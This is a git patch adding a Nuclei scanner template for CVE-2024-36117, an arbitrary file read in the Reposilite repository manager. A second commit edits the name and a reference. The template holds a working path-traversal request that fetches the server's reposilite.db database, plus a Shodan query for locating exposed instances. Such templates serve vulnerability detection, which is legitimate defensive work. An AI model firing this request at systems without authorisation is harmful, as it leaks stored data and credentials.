From 9b934a82ec38c4fd2f4e97a08d9a3f84ed487b5e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 11 Nov 2024 22:09:01 +0530 Subject: [PATCH 1/2] Create CVE-2024-36117.yaml --- http/cves/2024/CVE-2024-36117.yaml | 41 ++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2024/CVE-2024-36117.yaml diff --git a/http/cves/2024/CVE-2024-36117.yaml b/http/cves/2024/CVE-2024-36117.yaml new file mode 100644 index 00000000000..8e3151110c3 --- /dev/null +++ b/http/cves/2024/CVE-2024-36117.yaml @@ -0,0 +1,41 @@ +id: CVE-2024-36117 + +info: + name: Reposilite >= 3.3.0, < 3.5.12 Arbitrary File Read + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Reposilite is an open source, lightweight and easy-to-use repository manager for Maven based artifacts in JVM ecosystem. Reposilite v3.5.10 is affected by an Arbitrary File Read vulnerability via path traversal while serving expanded javadoc files. Reposilite has addressed this issue in version 3.5.12. There are no known workarounds for this vulnerability. This issue was discovered and reported by the GitHub Security lab and is also tracked as GHSL-2024-074. + reference: + - https://github.com/advisories/GHSA-82j3-hf72-7x93 + - https://github.com/dzikoysk/reposilite/commit/e172ae4b539c822d0d6e04cf090713c7202a79d6 + - https://github.com/dzikoysk/reposilite/releases/tag/3.5.12 + - https://github.com/dzikoysk/reposilite/security/advisories/GHSA-82j3-hf72-7x93 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 8.6 + cve-id: CVE-2024-36117 + cwe-id: CWE-22 + epss-score: 0.00045 + epss-percentile: 0.16805 + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:1212523028 + tags: cve,cve2024,reposilite,lfi + +variables: + javadoc_path: "releases/javadoc/1.0.0/" + +http: + - raw: + - | + GET /javadoc/{{javadoc_path}}/raw/..%5c..%2f..%2f..%2f..%2f..%2freposilite.db HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"reposilite") && contains(body,"SQLite format")' + - 'contains(header, "application/octet-stream")' + condition: and From 74884433527000effa16ebf7c7340da8cc1121bc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Nov 2024 18:53:19 +0530 Subject: [PATCH 2/2] Update CVE-2024-36117.yaml --- http/cves/2024/CVE-2024-36117.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-36117.yaml b/http/cves/2024/CVE-2024-36117.yaml index 8e3151110c3..fe9d3d753f7 100644 --- a/http/cves/2024/CVE-2024-36117.yaml +++ b/http/cves/2024/CVE-2024-36117.yaml @@ -1,7 +1,7 @@ id: CVE-2024-36117 info: - name: Reposilite >= 3.3.0, < 3.5.12 Arbitrary File Read + name: Reposilite >= 3.3.0, < 3.5.12 - Arbitrary File Read author: iamnoooob,rootxharsh,pdresearch severity: high description: | @@ -11,6 +11,7 @@ info: - https://github.com/dzikoysk/reposilite/commit/e172ae4b539c822d0d6e04cf090713c7202a79d6 - https://github.com/dzikoysk/reposilite/releases/tag/3.5.12 - https://github.com/dzikoysk/reposilite/security/advisories/GHSA-82j3-hf72-7x93 + - https://nvd.nist.gov/vuln/detail/CVE-2024-36117 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L cvss-score: 8.6